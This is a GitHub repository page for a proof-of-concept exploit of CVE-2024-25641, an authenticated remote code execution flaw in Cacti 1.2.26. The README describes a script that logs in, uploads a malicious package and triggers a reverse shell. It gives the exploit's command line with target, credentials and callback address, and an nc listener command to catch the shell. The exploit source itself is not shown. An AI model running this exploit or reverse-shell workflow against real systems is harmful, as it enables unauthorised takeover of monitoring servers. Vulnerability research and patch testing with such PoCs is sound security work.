Skip to content

Safarchand/CVE-2024-25641

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 
test.xml.gz
test.xml.gz
 
 

Repository files navigation

Cacti CVE-2024-25641 Authenticated Package Upload RCE Proof of Concept (PoC)

This script is a Proof of Concept (PoC) for exploiting the CVE-2024-25641 vulnerability in Cacti, a web-based monitoring tool. The script automates the process of authenticating with the application, uploading a malicious package, and triggering a reverse shell.

Requirements

  • Python 3.x
  • requests library
  • argparse library
  • re library

You can install the required Python library using pip3:

pip3 install requests
pip3 install argparse
pip3 install re

Usage

(make sure to place the test.xml.gz in the same directory as the exploit.py)

python3 exploit.py --url <TARGET_URL> -u <USERNAME> -p <PASSWORD> -i <LOCAL_IP> -l <PORT> [--proxy]

Start nc listener

nc -nvlp <port>

About

PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26

Topics

proof-of-concept exploit python3 poc rce cacti explotation rce-exploit cve-2024-25641

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages